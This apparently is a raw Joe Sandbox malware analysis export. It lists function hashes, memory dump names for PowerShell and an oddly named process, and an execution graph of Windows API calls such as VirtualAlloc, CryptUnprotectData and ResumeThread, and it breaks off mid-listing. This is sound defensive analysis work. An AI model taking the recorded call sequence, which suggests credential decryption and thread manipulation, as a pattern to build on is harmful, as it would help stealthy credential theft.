                                                                                                                                                                          • Opcode Fuzzy Hash: c4d6fba2d799aa0bf7809a56250d1a2d55bc6cb2828eb0b00e8725dad50403ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 25F0E232B0E5498FDBA4EB4CE0648A877E0FF8532470600BAE19DCB4B3CA25EC80C740
                                                                                                                                                                          Function 00007FFD9BAD41D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2866578938.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction ID: 060cbf5c6926f9373921e1497c4419669a32376a66f6ed45d368bdca15d30b57
                                                                                                                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction Fuzzy Hash: DCE01A31B0C8089FDB78DB4CE0519E9B3E1EB9832171202BBE15EC7571CA22ED518B80
                                                                                                                                                                          Function 00007FFD9BA0A2CA Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2861204149.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0f10521f1fde66030f0224c2b41597bb1d0a1eff70c7ef0da3f1f8cc9024be2c
                                                                                                                                                                          • Instruction ID: b274a96e7c298c55700ec3c5806b8f2f28a2921b3ca8d4eef678bc4f3b1ea3dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f10521f1fde66030f0224c2b41597bb1d0a1eff70c7ef0da3f1f8cc9024be2c
                                                                                                                                                                          • Instruction Fuzzy Hash: 12E01A35805A4C8FCF54EF18D8598E97BA0FF69201B0142ABE85DC7120DB719A58CBC2

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00007FFD9BAF6605 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2847346546.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9baf0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a61dc703d544fa20dafb8b4bee302d276af622cb54e3cd73e2cc81a49ca698ac
                                                                                                                                                                          • Instruction ID: 7ab751a6ef24f9a452da3f5aef871db5c7ee6a1c5475228519898d428cf923a6
                                                                                                                                                                          • Opcode Fuzzy Hash: a61dc703d544fa20dafb8b4bee302d276af622cb54e3cd73e2cc81a49ca698ac
                                                                                                                                                                          • Instruction Fuzzy Hash: 80D12522B0FB8E0FEBA59BAC48655F57FA1EF16314B0901BED49DC71E3DA58A805C341
                                                                                                                                                                          Function 00007FFD9BA2A114 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2833848332.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9ba20000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 55cb65d1599da5020af5e5049b9cf47decad1140941a884b845f125b0db4abdf
                                                                                                                                                                          • Instruction ID: 5beb65c0f05f5279f36eea92da6d58f8da27a7750dd114c2e4b70542703c5a05
                                                                                                                                                                          • Opcode Fuzzy Hash: 55cb65d1599da5020af5e5049b9cf47decad1140941a884b845f125b0db4abdf
                                                                                                                                                                          • Instruction Fuzzy Hash: C101087594EBCC4FD7679B648C690947FB0AF67210B0A00EBD489CB1B3DA595908CB92
                                                                                                                                                                          Function 00007FFD9BA29D06 Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2833848332.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9ba20000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 24bf081fe5c10377170f660e97a709f629bcd0a791a9cadce3aed5d98a8f3f31
                                                                                                                                                                          • Instruction ID: 93407c913784d778cb98f0ffa4d297e3b6be0603fc2d0a658f59a7e7330b5e4d
                                                                                                                                                                          • Opcode Fuzzy Hash: 24bf081fe5c10377170f660e97a709f629bcd0a791a9cadce3aed5d98a8f3f31
                                                                                                                                                                          • Instruction Fuzzy Hash: A201443544D7CC8FCB569F6888254A47FF0EF16210B0A41E7D449CB173D7699958C782
                                                                                                                                                                          Function 00007FFD9B90EF00 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2826271528.00007FFD9B90D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B90D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9b90d000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 37fa8d0089d7869beae9f8ef3fdd1a564018edf887e66e2d717d73b19692beb0
                                                                                                                                                                          • Instruction ID: c7e4db02a8c2425102fb70305775825cc1dc639f9331f7677b61417c8de3ac0c
                                                                                                                                                                          • Opcode Fuzzy Hash: 37fa8d0089d7869beae9f8ef3fdd1a564018edf887e66e2d717d73b19692beb0
                                                                                                                                                                          • Instruction Fuzzy Hash: A441247180EBC85FE7568B3998659523FF0EF57320B1A01DFD0C8CB1A3D625A846C792
                                                                                                                                                                          Function 00007FFD9BA2979B Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2833848332.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9ba20000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7d81ee09801d480a1b6267b226c90fb17c9df86245f91e9305b4ad9ec763c368
                                                                                                                                                                          • Instruction ID: c773e87bebe62fb6cdfe1187683eaf570f1c3b1846cf879869dd22f6c96dec20
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d81ee09801d480a1b6267b226c90fb17c9df86245f91e9305b4ad9ec763c368
                                                                                                                                                                          • Instruction Fuzzy Hash: 6731E631A1CB4C9FDB1CDB4C980A6A97BE0FBA9720F00422FE449D3251DB71A855CBC2
                                                                                                                                                                          Function 00007FFD9BA2A64C Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2833848332.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9ba20000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0c1062fe36591c451e7ec4ea61fbe95c07b4ef46c7ef74cea06a6efc6b12b795
                                                                                                                                                                          • Instruction ID: e5002753e2562427fc19237d4e51303ab12f8556ddba89da090c798dfa159f6c
                                                                                                                                                                          • Opcode Fuzzy Hash: 0c1062fe36591c451e7ec4ea61fbe95c07b4ef46c7ef74cea06a6efc6b12b795
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21283190CB4C4FEB59DBAC984A7E97FF0EB56320F04416BD449C3162DA74984ACB91
                                                                                                                                                                          Function 00007FFD9BA233B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2833848332.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9ba20000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                          • Instruction ID: ef0cfff55408565f3f2370646d3c2087cfd556061bc4c6768bd386db64d07b43
                                                                                                                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                          • Instruction Fuzzy Hash: B901A73020CB0C4FD748EF0CE051AA5B3E0FB85324F10056DE58AC36A5DB32E882CB41
                                                                                                                                                                          Function 00007FFD9BAF414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2847346546.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9baf0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d4dc833e58cef6a1ecdb97afeb5b84b18da4b737406f68a6900175ef531e4a84
                                                                                                                                                                          • Instruction ID: 3ab88fc2f5edfb890573c8fd1cb68d2e573206f09d73356d79cd2417cf9351be
                                                                                                                                                                          • Opcode Fuzzy Hash: d4dc833e58cef6a1ecdb97afeb5b84b18da4b737406f68a6900175ef531e4a84
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF09A32B0EA098FD768EB4CE4518E877E0EF5532071600BBE16DC75B3CA25EC408744
                                                                                                                                                                          Function 00007FFD9BAF4400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2847346546.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9baf0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cdf347f636d48c9b2c7f8501e3708bab3b3ffb0bdf636c3678664a6b1800d7b0
                                                                                                                                                                          • Instruction ID: 9c3c7a9a4c59b39382df46f4d675b6a3698b5a3298dd087e68df01ac0b59cbed
                                                                                                                                                                          • Opcode Fuzzy Hash: cdf347f636d48c9b2c7f8501e3708bab3b3ffb0bdf636c3678664a6b1800d7b0
                                                                                                                                                                          • Instruction Fuzzy Hash: BCF05E32B0E6498FDB64EB5CE4618E87BE0EF4532575600BAE159CB4B3DA26AC50C750
                                                                                                                                                                          Function 00007FFD9BAF41D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000D.00000002.2847346546.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9baf0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction ID: 84f582bd1835a8e3d6352b0aad0b16c2109eae8f81ff18e3952df5496aa2f0b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 60E01A31B0C9088FEA78DB4DE0519E9B7E1EB9832171201BBD14EC7571CA22ED518B84

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:14.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:10.5%
                                                                                                                                                                          Total number of Nodes:38
                                                                                                                                                                          Total number of Limit Nodes:3
                                                                                                                                                                          execution_graph 27039 7ffd9b9fd04a 27040 7ffd9b9fd059 CreateFileTransactedW 27039->27040 27042 7ffd9b9fd268 27040->27042 27068 7ffd9b9fe6da 27071 7ffd9b9fe6eb 27068->27071 27069 7ffd9b9fe815 27076 7ffd9b9fec5a 27069->27076 27071->27069 27072 7ffd9b9fe7db 27071->27072 27073 7ffd9b9fec5a GetSystemInfo 27072->27073 27074 7ffd9b9fe82a 27073->27074 27075 7ffd9b9fe820 27077 7ffd9b9fec65 27076->27077 27078 7ffd9b9fec85 27077->27078 27079 7ffd9b9fed22 GetSystemInfo 27077->27079 27078->27075 27080 7ffd9b9fed85 27079->27080 27080->27075 27056 7ffd9b9ff0f5 27057 7ffd9b9ff11f VirtualAlloc 27056->27057 27059 7ffd9b9ff23f 27057->27059 27060 7ffd9b9fd2f5 27061 7ffd9b9fd36b WriteFile 27060->27061 27063 7ffd9b9fd48f 27061->27063 27064 7ffd9b9fec91 27065 7ffd9b9fec9e GetSystemInfo 27064->27065 27067 7ffd9b9fed85 27065->27067 27035 7ffd9c10367e 27036 7ffd9c10369a 27035->27036 27037 7ffd9c1037a1 CryptUnprotectData 27036->27037 27038 7ffd9c1038af 27037->27038 27043 7ffd9b9fb57d 27044 7ffd9ba616a0 27043->27044 27047 7ffd9ba607d0 27044->27047 27046 7ffd9ba61789 27048 7ffd9ba607db 27047->27048 27050 7ffd9ba6087e 27048->27050 27051 7ffd9ba60897 27048->27051 27050->27046 27052 7ffd9ba608a2 27051->27052 27053 7ffd9ba608ea ResumeThread 27051->27053 27052->27050 27055 7ffd9ba609b4 27053->27055 27055->27050

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00007FFD9BBCC100 Relevance: 1.9, Strings: 1, Instructions: 680COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1105 7ffd9bbcc100-7ffd9bbcc11a 1106 7ffd9bbcc71c-7ffd9bbcc740 1105->1106 1107 7ffd9bbcc120-7ffd9bbcc130 1105->1107 1109 7ffd9bbcc77a-7ffd9bbcc790 1107->1109 1110 7ffd9bbcc136-7ffd9bbcc171 1107->1110 1113 7ffd9bbcc7da-7ffd9bbcc7ed 1109->1113 1114 7ffd9bbcc792-7ffd9bbcc7b6 1109->1114 1115 7ffd9bbcc20a-7ffd9bbcc212 1110->1115 1116 7ffd9bbcc176-7ffd9bbcc17f 1115->1116 1117 7ffd9bbcc218 1115->1117 1116->1109 1119 7ffd9bbcc185-7ffd9bbcc190 1116->1119 1118 7ffd9bbcc222-7ffd9bbcc23f 1117->1118 1122 7ffd9bbcc246-7ffd9bbcc257 1118->1122 1120 7ffd9bbcc21a-7ffd9bbcc21e 1119->1120 1121 7ffd9bbcc196-7ffd9bbcc1aa 1119->1121 1120->1118 1123 7ffd9bbcc1ac-7ffd9bbcc1c3 1121->1123 1124 7ffd9bbcc203-7ffd9bbcc207 1121->1124 1130 7ffd9bbcc259-7ffd9bbcc26e 1122->1130 1131 7ffd9bbcc270-7ffd9bbcc27f 1122->1131 1123->1109 1125 7ffd9bbcc1c9-7ffd9bbcc1d5 1123->1125 1124->1115 1127 7ffd9bbcc1d7-7ffd9bbcc1eb 1125->1127 1128 7ffd9bbcc1ef-7ffd9bbcc200 1125->1128 1127->1123 1129 7ffd9bbcc1ed 1127->1129 1128->1124 1129->1124 1130->1131 1134 7ffd9bbcc2a1-7ffd9bbcc30e 1131->1134 1135 7ffd9bbcc281-7ffd9bbcc29c 1131->1135 1144 7ffd9bbcc35f-7ffd9bbcc380 1134->1144 1145 7ffd9bbcc310-7ffd9bbcc323 1134->1145 1142 7ffd9bbcc6d9-7ffd9bbcc6f9 1135->1142 1149 7ffd9bbcc6fd-7ffd9bbcc70a 1142->1149 1152 7ffd9bbcc388-7ffd9bbcc3a6 1144->1152 1145->1109 1148 7ffd9bbcc329-7ffd9bbcc357 1145->1148 1156 7ffd9bbcc358-7ffd9bbcc35d 1148->1156 1151 7ffd9bbcc70c-7ffd9bbcc716 1149->1151 1151->1107 1153 7ffd9bbcc71b 1151->1153 1155 7ffd9bbcc3aa-7ffd9bbcc3b0 1152->1155 1153->1106 1158 7ffd9bbcc3ba-7ffd9bbcc3cb 1155->1158 1156->1145 1157 7ffd9bbcc35e 1156->1157 1157->1144 1159 7ffd9bbcc43c-7ffd9bbcc44d 1158->1159 1160 7ffd9bbcc3cd-7ffd9bbcc3d1 1158->1160 1161 7ffd9bbcc44e-7ffd9bbcc451 1159->1161 1160->1156 1163 7ffd9bbcc3d3 1160->1163 1165 7ffd9bbcc457-7ffd9bbcc45b 1161->1165 1164 7ffd9bbcc3fc-7ffd9bbcc40d 1163->1164 1164->1165 1170 7ffd9bbcc40f-7ffd9bbcc41d 1164->1170 1166 7ffd9bbcc45d-7ffd9bbcc45f 1165->1166 1168 7ffd9bbcc4a9-7ffd9bbcc4b1 1166->1168 1169 7ffd9bbcc461-7ffd9bbcc46f 1166->1169 1171 7ffd9bbcc4fb-7ffd9bbcc503 1168->1171 1172 7ffd9bbcc4b3-7ffd9bbcc4bc 1168->1172 1173 7ffd9bbcc471-7ffd9bbcc475 1169->1173 1174 7ffd9bbcc4e0-7ffd9bbcc4f5 1169->1174 1177 7ffd9bbcc48e-7ffd9bbcc4a3 1170->1177 1178 7ffd9bbcc41f-7ffd9bbcc423 1170->1178 1175 7ffd9bbcc509-7ffd9bbcc522 1171->1175 1176 7ffd9bbcc58b-7ffd9bbcc599 1171->1176 1179 7ffd9bbcc4bf-7ffd9bbcc4c1 1172->1179 1173->1164 1181 7ffd9bbcc477 1173->1181 1174->1171 1175->1176 1182 7ffd9bbcc524-7ffd9bbcc525 1175->1182 1183 7ffd9bbcc60a-7ffd9bbcc60b 1176->1183 1184 7ffd9bbcc59b-7ffd9bbcc59d 1176->1184 1177->1168 1178->1155 1193 7ffd9bbcc425 1178->1193 1186 7ffd9bbcc532-7ffd9bbcc534 1179->1186 1187 7ffd9bbcc4c3-7ffd9bbcc4c5 1179->1187 1181->1177 1189 7ffd9bbcc526-7ffd9bbcc530 1182->1189 1188 7ffd9bbcc63b-7ffd9bbcc63d 1183->1188 1190 7ffd9bbcc619-7ffd9bbcc61b 1184->1190 1191 7ffd9bbcc59f 1184->1191 1199 7ffd9bbcc535-7ffd9bbcc537 1186->1199 1194 7ffd9bbcc4c7 1187->1194 1195 7ffd9bbcc541-7ffd9bbcc545 1187->1195 1201 7ffd9bbcc6ae-7ffd9bbcc6d7 1188->1201 1202 7ffd9bbcc63f 1188->1202 1189->1186 1196 7ffd9bbcc68c 1190->1196 1197 7ffd9bbcc61d-7ffd9bbcc61f 1190->1197 1191->1189 1198 7ffd9bbcc5a1 1191->1198 1193->1159 1194->1161 1200 7ffd9bbcc4c9 1194->1200 1203 7ffd9bbcc547 1195->1203 1204 7ffd9bbcc5c1-7ffd9bbcc5db 1195->1204 1196->1149 1205 7ffd9bbcc68e-7ffd9bbcc690 1196->1205 1206 7ffd9bbcc69b-7ffd9bbcc69f 1197->1206 1207 7ffd9bbcc621 1197->1207 1208 7ffd9bbcc5a8-7ffd9bbcc5ac 1198->1208 1218 7ffd9bbcc5b8-7ffd9bbcc5c0 1199->1218 1219 7ffd9bbcc538 1199->1219 1210 7ffd9bbcc4ce-7ffd9bbcc4d4 1200->1210 1201->1142 1211 7ffd9bbcc65c-7ffd9bbcc66a 1202->1211 1203->1210 1212 7ffd9bbcc549 1203->1212 1231 7ffd9bbcc60d-7ffd9bbcc616 1204->1231 1232 7ffd9bbcc5dd-7ffd9bbcc5eb 1204->1232 1205->1151 1213 7ffd9bbcc692 1205->1213 1206->1153 1215 7ffd9bbcc6a1 1206->1215 1207->1208 1214 7ffd9bbcc623 1207->1214 1216 7ffd9bbcc628-7ffd9bbcc62e 1208->1216 1217 7ffd9bbcc5ae 1208->1217 1224 7ffd9bbcc550-7ffd9bbcc575 1210->1224 1230 7ffd9bbcc4d6 1210->1230 1223 7ffd9bbcc66b-7ffd9bbcc675 1211->1223 1212->1224 1213->1190 1225 7ffd9bbcc694 1213->1225 1214->1216 1215->1216 1226 7ffd9bbcc6a3 1215->1226 1234 7ffd9bbcc6aa-7ffd9bbcc6ad 1216->1234 1235 7ffd9bbcc630 1216->1235 1217->1199 1228 7ffd9bbcc5b0 1217->1228 1218->1204 1219->1179 1229 7ffd9bbcc539-7ffd9bbcc53a 1219->1229 1233 7ffd9bbcc677-7ffd9bbcc68a 1223->1233 1243 7ffd9bbcc578-7ffd9bbcc589 1224->1243 1225->1206 1226->1234 1228->1218 1229->1195 1230->1166 1236 7ffd9bbcc4d8 1230->1236 1231->1190 1232->1211 1238 7ffd9bbcc5ed-7ffd9bbcc5ef 1232->1238 1233->1196 1234->1201 1235->1233 1240 7ffd9bbcc632-7ffd9bbcc63a 1235->1240 1236->1174 1238->1223 1241 7ffd9bbcc5f1 1238->1241 1240->1188 1241->1243 1244 7ffd9bbcc5f3 1241->1244 1243->1176 1243->1182 1244->1183
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: a1_L
                                                                                                                                                                          • API String ID: 0-3309210877
                                                                                                                                                                          • Opcode ID: 2e994c3a046d2dcf0f08bd8d99fdba0ee277186c9a429f16a5d004102dff4eac
                                                                                                                                                                          • Instruction ID: 1c7aa5104d08c7693551b9e0baa0c0b77dc57e668491af97d04120457e02cd57
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e994c3a046d2dcf0f08bd8d99fdba0ee277186c9a429f16a5d004102dff4eac
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D228330B19A1D8FDBA8EB5CC8A5A7977E1FF64315B1141B9D00EC72A2DE24ED45CB80
                                                                                                                                                                          Function 00007FFD9BBCB1B9 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1372 7ffd9bbcb1b9-7ffd9bbcb1c2 1373 7ffd9bbcb1fa 1372->1373 1374 7ffd9bbcb1c4-7ffd9bbcb1f9 1372->1374 1376 7ffd9bbcb1fb-7ffd9bbcb273 1373->1376 1374->1373 1374->1376 1385 7ffd9bbcb275-7ffd9bbcb277 1376->1385 1386 7ffd9bbcb2e4-7ffd9bbcb2eb 1376->1386 1387 7ffd9bbcb279 1385->1387 1388 7ffd9bbcb2f3-7ffd9bbcb2f6 1385->1388 1386->1388 1389 7ffd9bbcb27b-7ffd9bbcb27d 1387->1389 1390 7ffd9bbcb2c0-7ffd9bbcb2ca 1387->1390 1391 7ffd9bbcb318-7ffd9bbcb319 1388->1391 1392 7ffd9bbcb2f8 1388->1392 1393 7ffd9bbcb2f9-7ffd9bbcb2fc 1389->1393 1394 7ffd9bbcb27f-7ffd9bbcb283 1389->1394 1396 7ffd9bbcb2cc-7ffd9bbcb2cd 1390->1396 1395 7ffd9bbcb31f-7ffd9bbcb325 1391->1395 1392->1393 1398 7ffd9bbcb2ff-7ffd9bbcb30c 1393->1398 1397 7ffd9bbcb285 1394->1397 1394->1398 1399 7ffd9bbcb326 1395->1399 1400 7ffd9bbcb3a1 1395->1400 1396->1398 1397->1396 1401 7ffd9bbcb287-7ffd9bbcb2ac 1397->1401 1405 7ffd9bbcb30e 1398->1405 1406 7ffd9bbcb2cf-7ffd9bbcb2d2 1398->1406 1402 7ffd9bbcb397-7ffd9bbcb39d 1399->1402 1403 7ffd9bbcb327-7ffd9bbcb32a 1399->1403 1404 7ffd9bbcb3a2-7ffd9bbcb3a3 1400->1404 1401->1395 1445 7ffd9bbcb2ae-7ffd9bbcb2cd 1401->1445 1418 7ffd9bbcb419 1402->1418 1419 7ffd9bbcb39f 1402->1419 1408 7ffd9bbcb32c 1403->1408 1409 7ffd9bbcb3a6-7ffd9bbcb3a9 1403->1409 1412 7ffd9bbcb3a4 1404->1412 1413 7ffd9bbcb41f 1404->1413 1414 7ffd9bbcb406-7ffd9bbcb414 1405->1414 1410 7ffd9bbcb2d3-7ffd9bbcb2da 1406->1410 1411 7ffd9bbcb25f-7ffd9bbcb273 1406->1411 1420 7ffd9bbcb373-7ffd9bbcb37e 1408->1420 1421 7ffd9bbcb32e-7ffd9bbcb331 1408->1421 1426 7ffd9bbcb3ab 1409->1426 1427 7ffd9bbcb425 1409->1427 1422 7ffd9bbcb2dc-7ffd9bbcb2e0 1410->1422 1423 7ffd9bbcb313 1410->1423 1411->1385 1411->1386 1424 7ffd9bbcb415-7ffd9bbcb418 1412->1424 1425 7ffd9bbcb3a5 1412->1425 1415 7ffd9bbcb490 1413->1415 1416 7ffd9bbcb420-7ffd9bbcb421 1413->1416 1428 7ffd9bbcb485 1414->1428 1429 7ffd9bbcb416-7ffd9bbcb418 1414->1429 1442 7ffd9bbcb492 1415->1442 1443 7ffd9bbcb41d-7ffd9bbcb41e 1415->1443 1441 7ffd9bbcb422-7ffd9bbcb424 1416->1441 1433 7ffd9bbcb49a 1418->1433 1434 7ffd9bbcb41a 1418->1434 1419->1400 1436 7ffd9bbcb3e6 1419->1436 1430 7ffd9bbcb37f-7ffd9bbcb394 1420->1430 1421->1404 1444 7ffd9bbcb333-7ffd9bbcb336 1421->1444 1422->1386 1423->1391 1424->1418 1431 7ffd9bbcb494-7ffd9bbcb499 1424->1431 1425->1409 1439 7ffd9bbcb3f2-7ffd9bbcb400 1426->1439 1440 7ffd9bbcb3ad-7ffd9bbcb3b1 1426->1440 1437 7ffd9bbcb4a6-7ffd9bbcb4aa 1427->1437 1438 7ffd9bbcb426-7ffd9bbcb43c 1427->1438 1432 7ffd9bbcb49c-7ffd9bbcb4a3 1428->1432 1429->1431 1429->1434 1430->1402 1431->1433 1433->1432 1451 7ffd9bbcb4f5-7ffd9bbcb4f9 1433->1451 1447 7ffd9bbcb41c-7ffd9bbcb41e 1434->1447 1448 7ffd9bbcb461-7ffd9bbcb466 1434->1448 1452 7ffd9bbcb467-7ffd9bbcb47f 1436->1452 1453 7ffd9bbcb3e7 1436->1453 1454 7ffd9bbcb4ac-7ffd9bbcb4ae 1437->1454 1455 7ffd9bbcb4b1-7ffd9bbcb4c3 1437->1455 1462 7ffd9bbcb442-7ffd9bbcb44e 1438->1462 1439->1414 1446 7ffd9bbcb3b2-7ffd9bbcb3b5 1440->1446 1441->1438 1442->1431 1443->1413 1443->1433 1444->1446 1450 7ffd9bbcb338 1444->1450 1445->1398 1457 